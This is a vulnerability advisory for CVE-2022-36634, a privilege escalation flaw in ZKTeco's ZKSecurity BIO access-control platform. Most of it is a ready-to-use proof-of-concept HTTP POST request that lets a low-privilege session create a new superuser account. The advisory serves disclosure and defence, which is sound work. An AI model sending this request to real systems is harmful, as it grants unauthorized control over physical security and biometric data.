ZKSecurity BIO 3.0.5.0_R Privilege Escalation Vulnerability

#######################ADVISORY INFORMATION#######################

Product: ZKSecurity BIO

Vendor: ZKTeco

Version Affected: 3.0.5.0_R

CVE: CVE-2022-36634

Vulnerability: User privilege escalation

#######################CREDIT#######################

This vulnerability was discovered and researched by Caio Burgardt and
Silton Santos.

#######################INTRODUCTION#######################

Based on the hybrid biometric technology and computer vision technology,
ZKBioSecurity provides a comprehensive web-based security platform. It
contains multiple integrated modules: personnel, time & attendance, access
control, visitor management, offline & online consumption management, guard
patrol, parking, elevator control, entrance control, Facekiosk, intelligent
video management, mask and temperature detection module, and other smart
sub-systems.

#######################VULNERABILITY DETAILS#######################

The application's access control management does not check the session's
permissions correctly. An attacker with "Person Self-Login" or "User"
privilege can create a super user with full privileges in the application

#######################PROOF OF CONCEPT#######################

POST /authUserAction!edit.action HTTP/1.1

Host: {HOST}

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101
Firefox/102.0

Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: multipart/form-data;
boundary=---------------------------291763244192371568695079347

Content-Length: 1956

Origin: http://{HOST}:8088

Connection: close

Referer: http://{HOST}:8088/base_index.action

Cookie: <INSERT_LOW-PRIVILEGE_COOKIE_HERE>

Upgrade-Insecure-Requests: 1





-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.username"





test_privesc

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.loginPwd"





KDla123

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="repassword"





KDla123

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.isActive"





true

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.isSuperuser"





true

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="groupIds"





-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="deptIds"





-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="areaIds"





-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.email"





-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.name"





-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.lastName"





-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="fingerTemplate"





-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="fingerId"





-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="logMethod"





add

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="un"





1657813612925_286

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="systemCode"





base

-----------------------------291763244192371568695079347--





#######################END#######################